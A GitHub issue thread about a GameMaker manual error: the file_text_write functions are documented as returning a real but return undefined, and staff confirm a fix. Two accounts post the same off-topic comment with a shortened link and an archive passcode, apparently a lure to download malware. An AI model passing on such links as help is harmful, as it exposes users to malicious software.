### ISSUE TITLE
`file_text_write_...` functions return `undefined`, not real

### ISSUE THREAD

**Issue by backYard321** [YoYoGames/GameMaker-Bugs#7527]
### Description

The manual page for `file_text_write_string()` says that it returns a real. However, there's no information about what the real represents, and I get `undefined` when I use it, so I'm assuming this is a doc bug and it should return "N/A". This also applies to `file_text_write_real()` and `file_text_writeln`

![image](https://github.com/user-attachments/assets/1bfb3a2d-956f-4c4a-879b-a5e1cf180cb6)

### Manual Link

https://manual.gamemaker.io/monthly/en/GameMaker_Language/GML_Reference/File_Handling/Text_Files/file_text_write_string.htm
https://manual.gamemaker.io/monthly/en/GameMaker_Language/GML_Reference/File_Handling/Text_Files/file_text_write_real.htm
https://manual.gamemaker.io/monthly/en/GameMaker_Language/GML_Reference/File_Handling/Text_Files/file_text_writeln.htm

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by tinsn** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by gurpreetsinghmatharoo** [comment]
Fixed, thank you

**Comment by mgeddesGM** [comment]
fix verified
